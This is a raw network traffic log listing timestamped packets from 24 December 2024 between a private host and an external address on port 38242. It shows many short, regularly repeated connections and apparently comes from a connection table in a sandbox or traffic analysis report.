Dec 24, 2024 07:54:24.977504015 CET	38242	44582	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:25.361455917 CET	44582	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:25.524725914 CET	38242	44582	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:25.978481054 CET	38242	44582	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:25.978591919 CET	44582	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:26.362806082 CET	44584	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:26.482899904 CET	38242	44584	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:26.483347893 CET	44584	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:26.483349085 CET	44584	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:26.603199005 CET	38242	44584	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:26.988420010 CET	44584	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:27.148529053 CET	38242	44584	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:27.604008913 CET	38242	44584	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:27.604077101 CET	44584	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:27.989516973 CET	44586	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:28.109592915 CET	38242	44586	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:28.109709978 CET	44586	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:28.109745979 CET	44586	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:28.229558945 CET	38242	44586	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:28.613416910 CET	44586	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:28.776693106 CET	38242	44586	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:29.224092960 CET	38242	44586	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:29.224205971 CET	44586	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:29.614310980 CET	44588	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:29.734076023 CET	38242	44588	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:29.734141111 CET	44588	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:29.734162092 CET	44588	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:29.853753090 CET	38242	44588	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:30.237663984 CET	44588	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:30.400650024 CET	38242	44588	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:30.853389978 CET	38242	44588	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:30.853450060 CET	44588	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:31.238840103 CET	44590	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:31.358505011 CET	38242	44590	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:31.358572960 CET	44590	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:31.358598948 CET	44590	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:31.478176117 CET	38242	44590	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:31.862564087 CET	44590	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:32.029217005 CET	38242	44590	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:32.482835054 CET	38242	44590	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:32.482897043 CET	44590	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:32.863524914 CET	44592	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:32.983206034 CET	38242	44592	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:32.983273029 CET	44592	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:32.983289003 CET	44592	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:33.103122950 CET	38242	44592	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:33.486242056 CET	44592	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:33.648513079 CET	38242	44592	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:34.098299026 CET	38242	44592	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:34.098356009 CET	44592	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:34.487401009 CET	44594	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:34.607064009 CET	38242	44594	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:34.607142925 CET	44594	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:34.607196093 CET	44594	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:34.726777077 CET	38242	44594	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:35.110979080 CET	44594	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:35.272593021 CET	38242	44594	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:35.725284100 CET	38242	44594	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:35.725400925 CET	44594	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:36.111999989 CET	44596	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:36.231651068 CET	38242	44596	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:36.231758118 CET	44596	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:36.231812000 CET	44596	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:36.351416111 CET	38242	44596	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:36.735639095 CET	44596	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:36.900510073 CET	38242	44596	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:37.365739107 CET	38242	44596	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:37.365811110 CET	44596	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:37.736434937 CET	44598	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:37.856072903 CET	38242	44598	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:37.856163025 CET	44598	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:37.856188059 CET	44598	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:37.975811958 CET	38242	44598	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:38.358894110 CET	44598	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:38.520701885 CET	38242	44598	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:38.991183996 CET	38242	44598	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:38.991261005 CET	44598	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:39.359689951 CET	44600	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:39.479394913 CET	38242	44600	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:39.479470015 CET	44600	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:39.479501009 CET	44600	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:39.599567890 CET	38242	44600	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:39.983735085 CET	44600	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:40.148575068 CET	38242	44600	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:40.609085083 CET	38242	44600	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:40.609185934 CET	44600	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:40.984478951 CET	44602	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:41.104357004 CET	38242	44602	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:41.104418039 CET	44602	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:41.104438066 CET	44602	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:41.224067926 CET	38242	44602	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:41.607294083 CET	44602	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:41.772577047 CET	38242	44602	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:42.224955082 CET	38242	44602	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:42.225023031 CET	44602	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:42.608071089 CET	44604	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:42.727674007 CET	38242	44604	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:42.727788925 CET	44604	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:42.727855921 CET	44604	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:42.847489119 CET	38242	44604	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:43.231398106 CET	44604	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:43.396584988 CET	38242	44604	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:43.848032951 CET	38242	44604	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:43.848134041 CET	44604	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:44.232446909 CET	44606	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:44.352338076 CET	38242	44606	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:44.352412939 CET	44606	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:44.352477074 CET	44606	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:44.472141981 CET	38242	44606	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:44.855647087 CET	44606	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:45.016701937 CET	38242	44606	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:45.465501070 CET	38242	44606	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:45.465632915 CET	44606	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:45.856728077 CET	44608	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:45.976351023 CET	38242	44608	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:45.976439953 CET	44608	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:45.976541042 CET	44608	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:46.096200943 CET	38242	44608	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:46.479826927 CET	44608	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:46.644560099 CET	38242	44608	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:47.113251925 CET	38242	44608	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:47.113593102 CET	44608	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:47.481918097 CET	44610	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:47.601672888 CET	38242	44610	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:47.601844072 CET	44610	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:47.601897955 CET	44610	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:47.721524000 CET	38242	44610	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:48.106877089 CET	44610	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:48.268620014 CET	38242	44610	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:48.722364902 CET	38242	44610	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:48.722527981 CET	44610	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:49.108426094 CET	44612	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:49.228547096 CET	38242	44612	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:49.228658915 CET	44612	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:49.228749037 CET	44612	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:49.348417044 CET	38242	44612	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:49.734059095 CET	44612	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:49.900657892 CET	38242	44612	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:50.379093885 CET	38242	44612	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:50.379245043 CET	44612	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:50.735639095 CET	44614	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:50.855494976 CET	38242	44614	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:50.855624914 CET	44614	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:50.855701923 CET	44614	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:50.975373030 CET	38242	44614	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:51.360519886 CET	44614	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:51.520670891 CET	38242	44614	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:51.975878954 CET	38242	44614	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:51.976278067 CET	44614	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:52.362507105 CET	44616	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:52.482343912 CET	38242	44616	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:52.482587099 CET	44616	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:52.482587099 CET	44616	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:52.602288008 CET	38242	44616	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:52.988456964 CET	44616	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:53.148655891 CET	38242	44616	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:53.603216887 CET	38242	44616	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:53.603457928 CET	44616	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:53.989758015 CET	44618	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:54.109734058 CET	38242	44618	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:54.109893084 CET	44618	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:54.109893084 CET	44618	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:54.229629993 CET	38242	44618	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:54.613326073 CET	44618	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:54.780587912 CET	38242	44618	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:55.252798080 CET	38242	44618	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:55.252990961 CET	44618	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:55.614877939 CET	44620	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:55.734643936 CET	38242	44620	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:55.734842062 CET	44620	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:55.734935045 CET	44620	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:55.854717970 CET	38242	44620	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:56.240184069 CET	44620	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:56.404619932 CET	38242	44620	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:56.854079962 CET	38242	44620	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:56.854293108 CET	44620	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:57.241821051 CET	44622	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:57.361475945 CET	38242	44622	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:57.361608982 CET	44622	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:57.361685038 CET	44622	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:57.481476068 CET	38242	44622	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:57.867055893 CET	44622	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:58.032819033 CET	38242	44622	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:58.487669945 CET	38242	44622	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:58.487828970 CET	44622	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:58.868792057 CET	44624	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:58.988477945 CET	38242	44624	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:58.988631964 CET	44624	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:58.988691092 CET	44624	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:59.108437061 CET	38242	44624	94.156.227.234	192.168.2.13
Dec 24, 2024 07:54:59.493825912 CET	44624	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:54:59.656572104 CET	38242	44624	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:00.112006903 CET	38242	44624	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:00.112217903 CET	44624	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:00.495595932 CET	44626	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:00.615291119 CET	38242	44626	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:00.615448952 CET	44626	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:00.615756035 CET	44626	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:00.735197067 CET	38242	44626	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:01.121380091 CET	44626	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:01.288815022 CET	38242	44626	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:01.736373901 CET	38242	44626	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:01.736563921 CET	44626	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:02.122886896 CET	44628	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:02.242741108 CET	38242	44628	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:02.242898941 CET	44628	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:02.242944956 CET	44628	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:02.362571955 CET	38242	44628	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:02.753993988 CET	44628	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:02.920593023 CET	38242	44628	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:03.365010023 CET	38242	44628	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:03.365132093 CET	44628	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:03.755683899 CET	44630	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:03.875396013 CET	38242	44630	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:03.875627995 CET	44630	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:03.875670910 CET	44630	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:03.995381117 CET	38242	44630	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:04.380916119 CET	44630	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:04.548666000 CET	38242	44630	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:04.989279985 CET	38242	44630	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:04.989646912 CET	44630	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:05.382519960 CET	44632	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:05.502140999 CET	38242	44632	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:05.502501965 CET	44632	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:05.502501965 CET	44632	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:05.622186899 CET	38242	44632	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:06.007390022 CET	44632	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:06.168692112 CET	38242	44632	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:06.630824089 CET	38242	44632	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:06.631170034 CET	44632	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:07.008985996 CET	44634	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:07.128925085 CET	38242	44634	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:07.129160881 CET	44634	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:07.129160881 CET	44634	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:07.248724937 CET	38242	44634	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:07.634331942 CET	44634	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:07.800579071 CET	38242	44634	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:08.254023075 CET	38242	44634	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:08.254297018 CET	44634	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:08.636006117 CET	44636	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:08.755705118 CET	38242	44636	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:08.755933046 CET	44636	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:08.755933046 CET	44636	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:08.875617027 CET	38242	44636	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:09.261190891 CET	44636	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:09.424866915 CET	38242	44636	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:09.885416031 CET	38242	44636	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:09.885596991 CET	44636	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:10.262779951 CET	44638	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:10.382435083 CET	38242	44638	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:10.382586002 CET	44638	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:10.382654905 CET	44638	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:10.502144098 CET	38242	44638	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:10.888247967 CET	44638	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:11.048801899 CET	38242	44638	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:11.514388084 CET	38242	44638	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:11.514709949 CET	44638	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:11.889955044 CET	44640	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:12.009560108 CET	38242	44640	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:12.009727001 CET	44640	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:12.009896994 CET	44640	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:12.129378080 CET	38242	44640	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:12.514933109 CET	44640	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:12.680773020 CET	38242	44640	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:13.130196095 CET	38242	44640	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:13.130369902 CET	44640	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:13.516788960 CET	44642	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:13.636791945 CET	38242	44642	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:13.636984110 CET	44642	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:13.636997938 CET	44642	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:13.756721020 CET	38242	44642	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:14.141092062 CET	44642	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:14.304886103 CET	38242	44642	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:14.780721903 CET	38242	44642	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:14.781064987 CET	44642	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:15.142373085 CET	44644	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:15.262284994 CET	38242	44644	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:15.262392044 CET	44644	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:15.262419939 CET	44644	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:15.382229090 CET	38242	44644	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:15.766619921 CET	44644	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:15.928925037 CET	38242	44644	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:16.394787073 CET	38242	44644	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:16.394896030 CET	44644	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:16.768244028 CET	44646	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:16.888431072 CET	38242	44646	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:16.888519049 CET	44646	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:16.888533115 CET	44646	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:17.008255959 CET	38242	44646	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:17.394305944 CET	44646	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:17.556705952 CET	38242	44646	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:18.023514032 CET	38242	44646	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:18.023749113 CET	44646	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:18.395926952 CET	44648	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:18.515834093 CET	38242	44648	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:18.516057968 CET	44648	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:18.516057968 CET	44648	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:18.635782003 CET	38242	44648	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:19.020050049 CET	44648	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:19.181101084 CET	38242	44648	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:19.645164013 CET	38242	44648	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:19.645469904 CET	44648	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:20.021230936 CET	44650	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:20.140959978 CET	38242	44650	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:20.141233921 CET	44650	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:20.141233921 CET	44650	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:20.261363029 CET	38242	44650	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:20.646645069 CET	44650	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:20.812715054 CET	38242	44650	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:21.271992922 CET	38242	44650	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:21.272300959 CET	44650	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:21.648322105 CET	44652	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:21.768378019 CET	38242	44652	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:21.768577099 CET	44652	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:21.768577099 CET	44652	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:21.888567924 CET	38242	44652	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:22.273772955 CET	44652	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:22.436733007 CET	38242	44652	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:22.898462057 CET	38242	44652	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:22.898813963 CET	44652	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:23.275417089 CET	44654	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:23.395524025 CET	38242	44654	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:23.395755053 CET	44654	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:23.395796061 CET	44654	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:23.515775919 CET	38242	44654	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:23.900243998 CET	44654	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:24.060720921 CET	38242	44654	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:24.532301903 CET	38242	44654	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:24.532565117 CET	44654	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:24.901612043 CET	44656	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:25.021569014 CET	38242	44656	94.156.227.234	192.168.2.13
Dec 24, 2024 07:55:25.021800995 CET	44656	38242	192.168.2.13	94.156.227.234
Dec 24, 2024 07:55:25.021816015 CET	44656	38242	192.168.2.13	94.156.227.234
